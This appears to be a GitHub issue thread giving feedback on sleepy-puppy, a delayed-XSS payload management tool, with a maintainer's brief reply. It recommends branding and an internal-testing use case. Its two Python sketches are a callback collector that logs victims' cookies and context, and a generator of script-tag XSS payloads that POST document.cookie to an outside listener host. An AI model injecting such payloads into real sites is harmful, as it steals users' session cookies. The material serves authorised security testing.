sleepy-puppy
OWASP Talk / Project Feedback Capture
I'm using this issue to capture the feedback from our conversation in person at the Netflix campus. First off, I just wanted to reiterate how much I love this project. Great stuff!
So a few recommendations:
- I recommend you change the project's tagline to something like "XSS Payload Management System", i.e. something that indicates the best thing about it is the ability to capture, manage, and track payloads over long periods of time.
- I think the name "Blind" is hurting the project, especially since it's a bit of a misnomer. "Blind" implies there's a normal kind of XSS that pops for the attacker in their own browser, but when you're attacking a real victim it never works that way: the payload pops out of band after being detonated by the victim. So the concept of "Blind XSS" as a separate thing just isn't valid. What your project does is much cooler, and it needs a name that properly captures it, and that name is DELAYED. Even then it's not actually a different type of XSS, just a different expectation about receiving a response: instead of instant gratification, you're waiting for the payload to explode for multiple users, in multiple contexts, over a long span of time. That's why the whole "Blind" thing is a red herring. It takes the focus away from where it should be, which is on the RECEIVING end.
- The other main aspect of your tool that you should focus on is Payload Detonation Attribution (PDA): the mechanism that lets you track who detonated the payload, and what their context / environment / rights / etc. were (see the first sketch after this list). That's huge, especially when you could be getting detonation events days, weeks, or months after the attack was sent. It's a really cool feature that should be front and center in the explanation of the tool.
- Pulling this all together, I think one of the main use cases an internal company should consider for this is maintaining a persistent listener instance, continuously shotgunning their apps with payloads that carry tracking information for each campaign, and then waiting (the second sketch below shows the campaign-tagging side). As payloads start detonating, instantly, or the day after, or months later, you can always link them back to a testing campaign. I think this is a really cool Enterprisey way of testing not just the basic input validation and output sanitization of the app itself, but also the various systems that may interact with application payloads throughout an organization.
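To make the detonation-attribution idea concrete, here's a minimal sketch of what the receiving side could look like. This is just an illustration under my own assumptions: the `/callback` route, field names, and SQLite storage are placeholders, not sleepy-puppy's actual API or schema. The core idea is that every payload carries a unique ID, and whatever detonates it reports the victim's context back so the event can be attributed even months after injection.

```python
# Hypothetical sketch of a payload-detonation collector.
# Route, fields, and table layout are assumptions for illustration,
# not sleepy-puppy's real schema or API.
import datetime
import sqlite3

from flask import Flask, request

app = Flask(__name__)
DB = "detonations.db"


def init_db():
    with sqlite3.connect(DB) as conn:
        conn.execute("""
            CREATE TABLE IF NOT EXISTS detonations (
                payload_id   TEXT,   -- which injected payload fired
                campaign_id  TEXT,   -- which testing campaign it belongs to
                url          TEXT,   -- page the payload executed on
                referrer     TEXT,
                user_agent   TEXT,
                cookies      TEXT,
                dom_title    TEXT,
                seen_at      TEXT    -- when it detonated (may be months later)
            )
        """)


@app.route("/callback", methods=["POST"])
def callback():
    # The injected JavaScript POSTs its context here when it detonates
    # in a victim's browser -- possibly days or months after injection.
    data = request.get_json(force=True)
    with sqlite3.connect(DB) as conn:
        conn.execute(
            "INSERT INTO detonations VALUES (?, ?, ?, ?, ?, ?, ?, ?)",
            (
                data.get("payload_id"),
                data.get("campaign_id"),
                data.get("url"),
                data.get("referrer"),
                request.headers.get("User-Agent"),
                data.get("cookies"),
                data.get("dom_title"),
                datetime.datetime.now(datetime.timezone.utc).isoformat(),
            ),
        )
    # Return an empty 204 so the callback stays as quiet as possible.
    return "", 204


if __name__ == "__main__":
    init_db()
    app.run()
```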
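And here's a rough sketch, under the same assumptions, of the campaign side of that workflow: each payload gets a campaign ID and a unique payload ID baked in at generation time, so when a detonation report shows up (instantly or months later) it joins straight back to the campaign and the exact injection point. The callback URL and the payload template are hypothetical, not sleepy-puppy's actual payloads.

```python
# Hypothetical sketch of generating campaign-tagged payloads.
# The callback URL, template, and naming are assumptions for illustration.
import uuid

CALLBACK = "https://listener.example.com/callback"

# Minimal JavaScript that reports its context out of band when it executes.
JS_TEMPLATE = (
    "fetch('{callback}',{{method:'POST',"
    "headers:{{'Content-Type':'application/json'}},"
    "body:JSON.stringify({{payload_id:'{payload_id}',"
    "campaign_id:'{campaign_id}',url:location.href,"
    "referrer:document.referrer,cookies:document.cookie,"
    "dom_title:document.title}})}});"
)


def make_payloads(campaign_id, injection_points):
    """Return one uniquely tagged <script> payload per injection point,
    so any later detonation maps back to this campaign and location."""
    payloads = {}
    for point in injection_points:
        payload_id = uuid.uuid4().hex
        js = JS_TEMPLATE.format(
            callback=CALLBACK, payload_id=payload_id, campaign_id=campaign_id
        )
        payloads[point] = (payload_id, f"<script>{js}</script>")
    return payloads


if __name__ == "__main__":
    # Example: one internal campaign sprayed across a few app inputs.
    tagged = make_payloads(
        "internal-apps-q1", ["search box", "feedback form", "profile name"]
    )
    for point, (pid, payload) in tagged.items():
        print(f"{point}: id={pid}\n  {payload}\n")
```

The point is just that the linkage lives inside the payload itself, so the listener never has to guess where a late detonation came from.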
Anyway, love the tool. Keep coding.
Thanks @danielmiessler, we will discuss these ideas and incorporate them as feature requests.